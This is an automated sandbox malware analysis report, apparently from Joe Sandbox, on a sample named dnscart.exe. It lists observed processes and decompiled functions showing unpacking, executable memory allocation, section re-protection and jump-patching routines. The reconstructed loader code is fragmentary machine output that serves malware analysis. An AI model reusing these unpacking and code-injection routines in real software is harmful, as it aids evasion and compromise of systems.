Analysis Process: mscorsvw.exe PID: 2792 Parent PID: 448

General

Start time:	21:08:46
Start date:	23/01/2018
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
Imagebase:	0x13fce0000
File size:	128696 bytes
MD5 hash:	30EAABE7A3B1081B6F5DDE4A1C0305D2
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: svchost.exe PID: 2828 Parent PID: 448

General

Start time:	21:08:47
Start date:	23/01/2018
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
Imagebase:	0xffa40000
File size:	27136 bytes
MD5 hash:	C78655BC80301D76ED4FEF1C1EA40A7D
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: sppsvc.exe PID: 2868 Parent PID: 448

General

Start time:	21:08:51
Start date:	23/01/2018
Path:	C:\Windows\System32\sppsvc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sppsvc.exe
Imagebase:	0xff990000
File size:	3524608 bytes
MD5 hash:	E17E0188BB90FAE42D83E98707EFA59C
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: WmiApSrv.exe PID: 2660 Parent PID: 448

General

Start time:	21:09:21
Start date:	23/01/2018
Path:	C:\Windows\System32\wbem\WmiApSrv.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\WmiApSrv.exe
Imagebase:	0xffbf0000
File size:	203264 bytes
MD5 hash:	38B84C94C5A8AF291ADFEA478AE54F93
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: dnscart.exe PID: 2264 Parent PID: 2992

Execution Graph

Execution Coverage:	5.5%
Dynamic/Decrypted Code Coverage:	42.7%
Signature Coverage:	2.4%
Total number of Nodes:	82
Total number of Limit Nodes:	7

Executed Functions

Function 001F16D3, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 38
process

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 45%

			E001F16D3() {
				void* __edi;
				void* __esi;
				int _t12;
				void* _t13;

				memset();
				 *(_t13 - 0x58) = 0x44;
				 *((intOrPtr*)(_t13 - 0x2c)) = 0x80;
				_t12 = CreateProcessW(_t13 - 0x360, 0, 0, 0, 0, 0, 0, 0, _t13 - 0x58, _t13 - 0x14); // executed
				if(_t12 == 0) {
					goto 0x330044;
					asm("int3");
					asm("int3");
					return _t12;
				} else {
					WaitForSingleObject(__esi, 0xffffffff);
					CloseHandle( *(__ebp - 0x14));
					CloseHandle( *(__ebp - 0x10));
					CloseHandle(__esi);
					CloseHandle(__edi);
					_pop(__edi);
					_pop(__esi);
					_pop(__ebp);
					return 1;
				}
			}

0x001f16d3
0x001f16dc
0x001f16e6
0x001f1707
0x001f170f
0x001f1691
0x001f1696
0x001f1697
0x001f1698
0x001f1711
0x001f1714
0x001f171d
0x001f1726
0x001f172d
0x001f1734
0x001f173a
0x001f1740
0x001f1743
0x001f1744
0x001f1744

APIs

memset.NTDLL ref: 001F16D3
CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 001F1707
WaitForSingleObject.KERNEL32(?,000000FF), ref: 001F1714
CloseHandle.KERNEL32(?), ref: 001F171D
CloseHandle.KERNEL32(?), ref: 001F1726
CloseHandle.KERNEL32 ref: 001F172D
CloseHandle.KERNEL32 ref: 001F1734

Strings

D, xrefs: 001F16DC

Memory Dump Source

Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd

Function 001F1670, Relevance: 9.0, APIs: 6, Instructions: 33

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E001F1670(signed int __eax, void* __ebx, void* __esi) {
				signed int _t38;

				_t38 = __eax %  *(__esi + __ebx - 0x17);
			}

0x001f1670

APIs

CreateMutexW.KERNELBASE(?), ref: 001F167E
CloseHandle.KERNEL32 ref: 001F168B
GetLastError.KERNEL32 ref: 001F1699
SetEvent.KERNEL32 ref: 001F16A7
CloseHandle.KERNEL32 ref: 001F16AE
CloseHandle.KERNEL32(00000000), ref: 001F16B5

Memory Dump Source

Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd

Function 001E201B, Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 18
string

Control-flow Graph

Executed
Not Executed

APIs

lstrcmp.KERNEL32(face,book), ref: 001E203A

Strings

book, xrefs: 001E202D
face, xrefs: 001E2032
just string, xrefs: 001E2020

Memory Dump Source

Source File: 00000001.00000002.184808452.00000000001E0000.00000040.sdmp, Offset: 001E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1e0000_dnscart.jbxd

Function 001F9F9D, Relevance: 6.0, APIs: 4, Instructions: 10

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E001F9F9D() {
				void* _t5;
				void* _t6;
				void* _t7;

				memset();
				HeapFree(GetProcessHeap(), 0, _t7); // executed
				L001F15B0(_t5, _t6); // executed
				ExitProcess(0);
			}

0x001f9f9d
0x001f9fb0
0x001f9fb6
0x001f9fbd

APIs

memset.NTDLL ref: 001F9F9D
GetProcessHeap.KERNEL32(00000000), ref: 001F9FA9
HeapFree.KERNEL32(00000000), ref: 001F9FB0
ExitProcess.KERNEL32 ref: 001F9FBD

Memory Dump Source

Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd

Function 001E2663, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 188

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 52%

			E001E2663(intOrPtr _a4) {
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				long _v44;
				char _v76;
				intOrPtr _v80;
				DWORD* _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr* _v96;
				void* _v100;
				intOrPtr _v104;
				intOrPtr* _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr* _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				int _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				signed int _v164;
				signed int _v168;
				intOrPtr _v172;
				int _v176;
				intOrPtr _v180;
				char _v184;
				intOrPtr _t100;
				intOrPtr _t107;
				intOrPtr _t108;
				int _t113;
				int _t131;
				void* _t135;
				intOrPtr _t157;
				intOrPtr _t159;
				char* _t160;
				intOrPtr _t161;
				void* _t164;
				intOrPtr _t183;
				unsigned int _t186;
				intOrPtr _t192;
				void* _t206;
				intOrPtr _t210;

				_t100 = _a4;
				_v44 = 0;
				_t135 =  *((intOrPtr*)(_t100 + 0x3c));
				_v184 = _t135;
				_v180 = _t100;
				_v80 = _t100;
				_v84 =  &_v44;
				_v88 =  *((intOrPtr*)(_t100 + 0x20));
				_v92 =  *((intOrPtr*)(_t100 + 0x40));
				_v96 = _t100 + 0x3c;
				_v100 = _t135;
				E001E23F0(); // executed
				E001E188A(_v100);
				_t210 = _t206 - 8 + 8 - 4 + 4;
				_t164 = _v100;
				_t192 =  *((intOrPtr*)(_t164 + 0x3c));
				_v104 = _t164 + _t192;
				_v108 = _v100 + 0x3c;
				_v112 = 0x18;
				if(_t192 + 0xffffffc0 <= 0xfc0) {
					_t161 = _v104;
					_t134 =  ==  ? _t161 + 0x18 : 0x18;
					_v112 =  ==  ? _t161 + 0x18 : 0x18;
				}
				_v116 = _v112;
				if(_v92 == 0) {
					L4:
					_v140 =  *_v96;
					_v144 = 0;
					do {
						_t107 = _v144;
						 *((char*)(_v140 + _t107)) =  *((intOrPtr*)(_v100 + _t107));
						_t108 = _t107 + 1;
						_v144 = _t108;
					} while (_t108 != 0x400);
					_t110 =  ==  ? _v100 +  *_v108 : 0;
					 *((intOrPtr*)(( ==  ? _v100 +  *_v108 : 0) + 0x34)) =  *_v96;
					_t113 = VirtualProtect(_v100, 0x400, 2,  &_v44); // executed
					_t183 = _v80;
					_v40 =  *((intOrPtr*)(_t183 + 0x6c));
					_v36 =  *((intOrPtr*)(_t183 + 0x70));
					_v32 =  *((intOrPtr*)(_t183 + 0x74));
					_v28 =  *((intOrPtr*)(_t183 + 0x68));
					_v24 =  *((intOrPtr*)(_t183 + 0x64));
					_v20 = _v100 +  *((intOrPtr*)(_t183 + 0x44));
					 *((intOrPtr*)(_t210 - 0xc)) = _t183;
					_v184 = 0;
					_v180 = 0x78;
					_v148 = _t113;
					_v152 = 0;
					_v156 = 0x78;
					E001E104C();
					_t210 =  *((intOrPtr*)( &_v40 + 0x10));
					goto __eax;
				} else {
					_t160 =  &_v76;
					_t203 =  ==  ? _v104 : 0;
					_v120 = ( *(( ==  ? _v104 : 0) + 0x14) & 0x0000ffff) + _v116;
					_v124 = _t160;
					_v128 = _t160 + 0x10;
					_v132 = _t160;
					_v136 = 0;
					while(1) {
						_t157 = _v120;
						_t186 =  *(_t157 + 0x24);
						_v160 = _v136;
						_v164 = _t186 >> 0x0000001e & 0x00000001;
						_v168 = _t186 >> 0x1f;
						 *_v124 = 1;
						asm("movaps xmm0, [0x1e40e0]");
						asm("movups [eax], xmm0");
						_v172 = _t157;
						_t131 = VirtualProtect(_v100 +  *((intOrPtr*)(_t157 + 0xc)),  *(_t157 + 8),  *( &_v76 + (_v164 << 4) + (_v168 << 3) + ((_t186 >> 0x0000001d & 0x00000001) << 2)),  &_v44); // executed
						_t159 = _v160 + 1;
						_v176 = _t131;
						_v120 = _v172 + 0x28;
						_v136 = _t159;
						if(_t159 == _v92) {
							goto L4;
						}
					}
					goto L4;
				}
			}

0x001e266f
0x001e2675
0x001e2687
0x001e268d
0x001e2690
0x001e2694
0x001e2697
0x001e269a
0x001e269d
0x001e26a0
0x001e26a3
0x001e26a6
0x001e26b7
0x001e26bc
0x001e26ca
0x001e26cd
0x001e26db
0x001e26de
0x001e26e1
0x001e26e4
0x001e26eb
0x001e26f9
0x001e26fc
0x001e26fc
0x001e2708
0x001e270b
0x001e2749
0x001e2750
0x001e2756
0x001e275c
0x001e275c
0x001e276e
0x001e2771
0x001e2779
0x001e2779
0x001e279c
0x001e279f
0x001e27b1
0x001e27bd
0x001e27c6
0x001e27cc
0x001e27d2
0x001e27d8
0x001e27de
0x001e27e1
0x001e27e7
0x001e27ea
0x001e27f2
0x001e27fa
0x001e2800
0x001e2806
0x001e280c
0x001e2822
0x001e2828
0x001e270d
0x001e270f
0x001e271f
0x001e2732
0x001e2735
0x001e2738
0x001e273b
0x001e273e
0x001e2835
0x001e283b
0x001e284c
0x001e284f
0x001e285d
0x001e286e
0x001e2877
0x001e287d
0x001e2887
0x001e28b0
0x001e28b6
0x001e28be
0x001e28cf
0x001e28d5
0x001e28d8
0x001e28de
0x00000000
0x00000000
0x001e28e4
0x00000000
0x001e2835

APIs

Part of subcall function 001E23F0: VirtualAlloc.KERNELBASE(00000000,00010000,00001000,00000040), ref: 001E2428

VirtualProtect.KERNELBASE(?,00000400,00000002,00000000), ref: 001E27B1
VirtualProtect.KERNELBASE(?,?,?,00000000), ref: 001E28B6

Strings

x, xrefs: 001E27F2

Memory Dump Source

Source File: 00000001.00000002.184808452.00000000001E0000.00000040.sdmp, Offset: 001E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1e0000_dnscart.jbxd

Function 00A11490, Relevance: 4.6, APIs: 3, Instructions: 80
network

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E00A11490() {
				void* _v8;
				char _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				intOrPtr _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int _v48;
				int _v52;
				intOrPtr _v56;
				char _v57;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _t37;
				char _t49;
				void* _t52;
				intOrPtr _t57;
				signed int _t66;
				intOrPtr* _t68;

				_t68 = (_t66 & 0xfffffff8) - 0x40;
				_v36 = 0x724c9cf2;
				_v48 = _v40;
				if(_v36 * 0x4af67b65 <= 0xea54d4c) {
					L5:
					_t37 = E00A2BFE0(__eflags); // executed
					_v32 = 1;
					_v40 = 0x26a1df5e;
					_v56 = _t37;
				} else {
					_v44 = 0x66c06364;
					_v52 = AreFileApisANSI();
					SetFileApisToANSI();
					SetFileApisToOEM();
					_v28 = 0x5a4;
					while(1) {
						_v40 = _v48 << _v48;
						_v20 = _v24 << 9;
						_v24 = 0;
						_t49 = _v28;
						_v16 = _t49;
						L00A2C376(); // executed
						_v40 = 0;
						if(_t49 != 0) {
							break;
						}
						L00A2C37C(); // executed
						_t57 = _v16 + 0xffffffff;
						_v28 = _t57;
						__eflags = _t57 - 0x59b;
						_v57 = _t49;
						if(_t57 != 0x59b) {
							continue;
						} else {
							goto L7;
						}
						while(1) {
							L7:
							_v64 = 0x47fd703f;
							L00A2C3A0();
							_v20 = _v20;
							_v24 = _v24;
							_v68 = 0x47fd703f;
							if(_v64 <= _v44) {
								break;
							}
						}
						 *_t68 = DragAcceptFiles; // executed
						_t52 = E00A295E0(); // executed
						_v32 = 0xffffffff;
						__eflags = _t52;
						if(__eflags == 0) {
							goto L5;
						} else {
						}
						goto L9;
					}
					goto L7;
				}
				L9:
				_v40 = 0x5d24a093;
				return _v32;
			}

0x00a11497
0x00a1149a
0x00a114b4
0x00a114b8
0x00a11528
0x00a11528
0x00a1152d
0x00a11535
0x00a1153d
0x00a114ba
0x00a114fc
0x00a11511
0x00a11515
0x00a1151c
0x00a1151e
0x00a114bc
0x00a114c8
0x00a114d3
0x00a114d7
0x00a114df
0x00a114e3
0x00a114e7
0x00a114f2
0x00a114f8
0x00000000
0x00000000
0x00a11543
0x00a1154c
0x00a1154f
0x00a11553
0x00a11559
0x00a1155d
0x00000000
0x00000000
0x00000000
0x00000000
0x00a11563
0x00a11563
0x00a11568
0x00a1156c
0x00a11581
0x00a11585
0x00a1158f
0x00a11593
0x00000000
0x00000000
0x00a11595
0x00a115ae
0x00a115b1
0x00a115b6
0x00a115be
0x00a115c1
0x00000000
0x00000000
0x00a115c7
0x00000000
0x00a115c1
0x00000000
0x00a114fa
0x00a11597
0x00a1159b
0x00a115a8

APIs

IsPwrSuspendAllowed.POWRPROF ref: 00A114E7
IsPwrShutdownAllowed.POWRPROF ref: 00A11543
WSACleanup.WS2_32 ref: 00A1156C

Part of subcall function 00A295E0: IsPwrSuspendAllowed.POWRPROF(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,66C06364), ref: 00A2969B

Memory Dump Source

Source File: 00000001.00000002.189109573.0000000000A11000.00000020.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000001.00000002.189092931.0000000000A10000.00000002.sdmp
Associated: 00000001.00000002.189181189.0000000000A2D000.00000004.sdmp
Associated: 00000001.00000002.189194686.0000000000A2F000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a10000_dnscart.jbxd

Function 001F9F42, Relevance: 4.5, APIs: 3, Instructions: 25

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 47%

			E001F9F42() {
				void* _t6;
				void* _t11;
				void* _t12;
				void* _t18;
				void* _t19;
				void* _t20;

				L001F1B10(E001F1BE0(_t11, _t12, _t18, _t19), 0x1f11f0, _t18, _t19);
				_push(0x1fc0d0);
				_push(0x64df2dad);
				_push(0x48);
				_t15 = E001F1BE0(_t11, 0x8f7ee672, _t18, _t19);
				L001F1B10(_t3, 0x1f10d0, _t18, _t19);
				_t6 = RtlAllocateHeap(GetProcessHeap(), 0, 0x8000000); // executed
				_t20 = _t6;
				if(_t20 == 0) {
					L3:
					ExitProcess(0);
				}
				goto 0x331d52;
				asm("int3");
				asm("int3");
				asm("int3");
				memset();
				HeapFree(GetProcessHeap(), 0, _t20); // executed
				L001F15B0(_t11, _t15); // executed
				goto L3;
			}

0x001f9f4e
0x001f9f5b
0x001f9f60
0x001f9f65
0x001f9f71
0x001f9f73
0x001f9f89
0x001f9f8f
0x001f9f93
0x001f9fbb
0x001f9fbd
0x001f9fbd
0x001f9f95
0x001f9f9a
0x001f9f9b
0x001f9f9c
0x001f9f9d
0x001f9fb0
0x001f9fb6
0x00000000

APIs

GetProcessHeap.KERNEL32(00000000,08000000), ref: 001F9F82
RtlAllocateHeap.NTDLL(00000000), ref: 001F9F89
ExitProcess.KERNEL32 ref: 001F9FBD

Memory Dump Source

Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd

Function 00A295E0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E00A295E0(char _a4) {
				void* _v16;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				signed int _v68;
				signed int _v72;
				char _v73;
				char _t30;
				signed int _t37;
				signed int _t46;
				signed int _t49;
				intOrPtr* _t51;

				_t51 = (_t49 & 0xfffffff8) - 0x40;
				_t30 = _a4;
				_t37 = _v24;
				_v24 = 0x39637a74;
				_v28 = 0;
				_v32 = 0x4409d84c;
				_v36 = 0x77a6fdfb;
				_v44 = 0;
				_v48 = 0x16c1778c;
				_v24 = _t37 + 0x6a70436f;
				_t46 = _v32 ^ 0xa4617aa1 | _v28;
				_v52 = _t30;
				_v56 = _t37;
				_v60 = 0x16c1778c;
				_v64 = 0;
				_v68 = _t46;
				if(_t46 == 0) {
					L4:
					L00A2C376(); // executed
					_v73 = _t30;
					_v40 = (_t37 & 0xffffff00 | E00A299F0(__eflags) != 0x00000000) & 1;
				} else {
					 *_t51 = _v52;
					_v72 = _v36 + 0x88590205;
					_t30 = E00A296C0();
					_v40 = 1;
					_t37 = _v72;
					if(_t30 == _t37) {
						goto L4;
					}
				}
				_v24 = _v56;
				return _v40; // executed
			}

0x00a295e9
0x00a295ec
0x00a295ef
0x00a295f3
0x00a295fb
0x00a29603
0x00a2960b
0x00a29613
0x00a2961b
0x00a29632
0x00a29644
0x00a29646
0x00a2964a
0x00a2964e
0x00a29652
0x00a29656
0x00a2965a
0x00a2969b
0x00a2969b
0x00a296a0
0x00a296b5
0x00a2965c
0x00a2966b
0x00a2966e
0x00a29672
0x00a29677
0x00a2967f
0x00a29685
0x00000000
0x00000000
0x00a29685
0x00a2968f
0x00a2969a

APIs

IsPwrSuspendAllowed.POWRPROF(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,66C06364), ref: 00A2969B

Strings

tzc9, xrefs: 00A295F3

Memory Dump Source

Source File: 00000001.00000002.189109573.0000000000A11000.00000020.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000001.00000002.189092931.0000000000A10000.00000002.sdmp
Associated: 00000001.00000002.189181189.0000000000A2D000.00000004.sdmp
Associated: 00000001.00000002.189194686.0000000000A2F000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a10000_dnscart.jbxd

Function 00A2B160, Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 163

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 00A2B2F4

Strings

YA+q, xrefs: 00A2B236

Memory Dump Source

Source File: 00000001.00000002.189109573.0000000000A11000.00000020.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000001.00000002.189092931.0000000000A10000.00000002.sdmp
Associated: 00000001.00000002.189181189.0000000000A2D000.00000004.sdmp
Associated: 00000001.00000002.189194686.0000000000A2F000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a10000_dnscart.jbxd

Function 001E23F0, Relevance: 1.4, APIs: 1, Instructions: 200

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 30%

			E001E23F0(intOrPtr _a4, void* _a8) {
				char _v21;
				char _v26;
				char _v31;
				intOrPtr* _v36;
				intOrPtr _v40;
				intOrPtr* _v44;
				intOrPtr* _v48;
				void** _v52;
				char* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr* _v72;
				intOrPtr* _v76;
				intOrPtr* _v80;
				void** _v84;
				char* _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				char* _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				void* _t121;
				intOrPtr _t143;
				intOrPtr _t148;
				intOrPtr _t157;
				intOrPtr _t158;
				void* _t162;
				intOrPtr _t164;
				intOrPtr _t167;
				char* _t168;
				void** _t173;
				void* _t178;
				intOrPtr _t191;
				intOrPtr _t197;
				intOrPtr _t214;
				intOrPtr _t217;
				intOrPtr* _t223;
				void** _t232;
				char* _t234;
				void* _t243;
				intOrPtr* _t244;

				_v36 =  &_v21;
				_v40 = _a4;
				_v44 =  &_v31;
				_v48 =  &_v26;
				_t121 = VirtualAlloc(0, 0x10000, 0x1000, 0x40); // executed
				_t234 =  &_v21;
				_t168 =  &_v26;
				_v52 = _t121;
				_v56 =  &_v31;
				 *_v52 = 0;
				_v60 =  *((intOrPtr*)(_v40 + 0x3c));
				_v64 = 4;
				_v68 = _v40 + _v60;
				_t130 =  ==  ? _v68 : 0;
				_v72 = _v56 + 1;
				_v76 = _t168 + 1;
				_v80 = _t234 + 1;
				_v84 =  &(_v52[1]);
				_v88 = _t168;
				_v92 = _v40 -  *((intOrPtr*)(( ==  ? _v68 : 0) + 0x34));
				_v96 = _v64;
				_v100 = _t234;
				_v104 = 0xfffffffb - _v52;
				_v108 = 0;
				while(1) {
					_t191 = _v96;
					_v112 = _v108;
					_v116 = _t191;
					_t143 = _t191 + _v52;
					 *_v56 = 0xe8;
					 *_v72 = 0x1e2194 - _t143;
					_t173 = _v52;
					_v120 = _t143;
					 *((intOrPtr*)(_t173 + _v116)) =  *_v44;
					_t197 = _v116;
					 *((char*)(_t173 + _t197 + 4)) =  *((intOrPtr*)(_v44 + 4));
					_t148 =  *((intOrPtr*)(0x1e305c + _v112 * 0xc + 4));
					_v124 = _t148;
					_t178 = _t148 + _v40;
					 *_v88 = 0xe9;
					_v128 = _v120 + 0xfffffffb - _t178;
					_v132 = _t197 + 5;
					 *_v76 = _v128;
					 *_v100 = 0xe9;
					 *_v80 = _v104 + 0xfffffffb - _v116 + _t178;
					_v136 =  *((intOrPtr*)(0x1e305c + _v112 * 0xc + 8));
					_v140 =  *((intOrPtr*)(0x1e305c + _v112 * 0xc));
					_v144 = _v52 + _v132;
					_v148 = 0;
					do {
						_t157 = _v148;
						 *((char*)(_v144 + _t157)) =  *((intOrPtr*)(_v140 + _t157));
						_t158 = _t157 + 1;
						_v148 = _t158;
					} while (_t158 != _v136);
					_t244 = _t243 - 0x14;
					 *_t244 = _v40;
					_v164 = _v92;
					_v160 = _v124;
					_v156 = _v136;
					_v152 = _v144;
					E001E21AC();
					_t243 = _t244 + 0x14;
					_t162 = _v116 + _v136;
					_t223 = _v36;
					_t232 = _v84;
					 *((intOrPtr*)(_t232 + _t162)) =  *_t223;
					 *((char*)(_t232 + _t162 + 4)) =  *((intOrPtr*)(_t223 + 4));
					_t164 = _v40;
					_t214 = _v124;
					 *((intOrPtr*)(_t164 + _t214)) =  *_v48;
					 *((char*)(_t164 + _t214 + 4)) =  *((intOrPtr*)(_v48 + 4));
					_t167 = _v116 + 0xe + _v136;
					_t217 = _v112 + 1;
					_v96 = _t167;
					_v108 = _t217;
					if(_t217 != 0x160) {
						continue;
					}
					return _t167;
				}
			}

0x001e241c
0x001e241f
0x001e2422
0x001e2425
0x001e2428
0x001e2431
0x001e2439
0x001e243c
0x001e2442
0x001e2448
0x001e2454
0x001e245a
0x001e2465
0x001e2477
0x001e2486
0x001e248e
0x001e249b
0x001e24a4
0x001e24aa
0x001e24ad
0x001e24b0
0x001e24b3
0x001e24b6
0x001e24b9
0x001e24c9
0x001e24cc
0x001e24e5
0x001e24ea
0x001e24f0
0x001e24f5
0x001e24fd
0x001e2504
0x001e2507
0x001e250d
0x001e2516
0x001e2519
0x001e252d
0x001e2531
0x001e2537
0x001e253c
0x001e2547
0x001e254d
0x001e2553
0x001e2567
0x001e2579
0x001e258d
0x001e2593
0x001e2599
0x001e259f
0x001e25a5
0x001e25a5
0x001e25ba
0x001e25bd
0x001e25c8
0x001e25c8
0x001e25d0
0x001e25d6
0x001e25dc
0x001e25e3
0x001e25ed
0x001e25f7
0x001e25fb
0x001e2600
0x001e260c
0x001e260e
0x001e2613
0x001e2616
0x001e261c
0x001e2625
0x001e2628
0x001e262b
0x001e2634
0x001e2644
0x001e2649
0x001e2652
0x001e2655
0x001e2658
0x00000000
0x001e265e
0x001e24c8
0x001e24c8

APIs

VirtualAlloc.KERNELBASE(00000000,00010000,00001000,00000040), ref: 001E2428

Memory Dump Source

Source File: 00000001.00000002.184808452.00000000001E0000.00000040.sdmp, Offset: 001E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1e0000_dnscart.jbxd

Function 00A2BDB0, Relevance: 1.4, APIs: 1, Instructions: 142

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 00A2BFB7

Memory Dump Source

Source File: 00000001.00000002.189109573.0000000000A11000.00000020.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000001.00000002.189092931.0000000000A10000.00000002.sdmp
Associated: 00000001.00000002.189181189.0000000000A2D000.00000004.sdmp
Associated: 00000001.00000002.189194686.0000000000A2F000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a10000_dnscart.jbxd

Function 001E1C91, Relevance: 1.3, APIs: 1, Instructions: 76

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 001E1CD7

Memory Dump Source

Source File: 00000001.00000002.184808452.00000000001E0000.00000040.sdmp, Offset: 001E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1e0000_dnscart.jbxd

Non-executed Functions

Function 001F8DA0, Relevance: 3.0, APIs: 2, Instructions: 34

APIs

RtlGetVersion.NTDLL ref: 001F8DAD
GetNativeSystemInfo.KERNEL32(?), ref: 001F8DB7

Memory Dump Source

Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd

Function 001E2088, Relevance: 2.6, Strings: 2, Instructions: 71

Strings

luck, xrefs: 001E20CC
%X%P, xrefs: 001E212D, 001E2143

Memory Dump Source

Source File: 00000001.00000002.184808452.00000000001E0000.00000040.sdmp, Offset: 001E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1e0000_dnscart.jbxd

Function 001F2E6A, Relevance: 1.8, Strings: 1, Instructions: 509
Crypto

C-Code - Quality: 50%

			E001F2E6A(void* __ebx, void* __fp0) {
				signed int _t1688;
				signed int _t1692;
				void* _t2075;
				signed int _t2086;
				signed int _t2465;
				void* _t2870;

				_t2075 = __ebx;
				 *(_t2870 - 0x1c) = 0xffffffff;
				 *(_t2870 - 4) =  *(_t2870 + 0xc);
				 *((intOrPtr*)(_t2870 - 0x18)) =  *(_t2870 + 0xc) +  *( *(_t2870 + 0x10));
				 *(_t2870 - 0x14) =  *(_t2870 + 0x18);
				 *((intOrPtr*)(_t2870 - 0x70)) =  *(_t2870 + 0x18) +  *( *(_t2870 + 0x1c));
				if(( *(_t2870 + 0x20) & 0x00000004) == 0) {
